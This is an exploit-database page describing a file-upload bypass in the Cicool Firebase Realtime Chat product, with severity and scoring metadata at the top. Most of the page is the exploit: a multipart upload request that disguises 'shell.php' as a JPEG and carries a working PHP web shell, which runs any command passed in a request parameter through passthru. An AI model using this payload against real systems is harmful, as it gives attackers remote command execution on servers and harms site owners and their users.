Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CWE-601 | $500 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2019-10-21 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H | 0.02192 | 0.50148 |
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] Exploit Title : Cicool - Firebase Realtime Chat upload shell bypass [+] Author : [+] Team: VHB Group [+] Tested on : Windows 10/Linux [+] Home Page: https://codecanyon.net/item/cicool-firebase-realtime-chat/24842321 [+] [+] Demo : https://cicool.go-moment.com/version/v3//uploads/chat/20191021151333-2019-10-21chat151329.html POC fix queries with burp suite. You can go to the chat page and edit the information Content-Disposition: form-data; name="qqfile"; filename="shell.php" Content-Type: image/jpeg <form action="" method="get"> Command: <input type="text" name="cmd" /><input type="submit" value="Exec" /> </form> Output:<br /> <pre><?php passthru($_REQUEST['cmd'], $result); ?></pre> -----------------------------307831217212391--
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.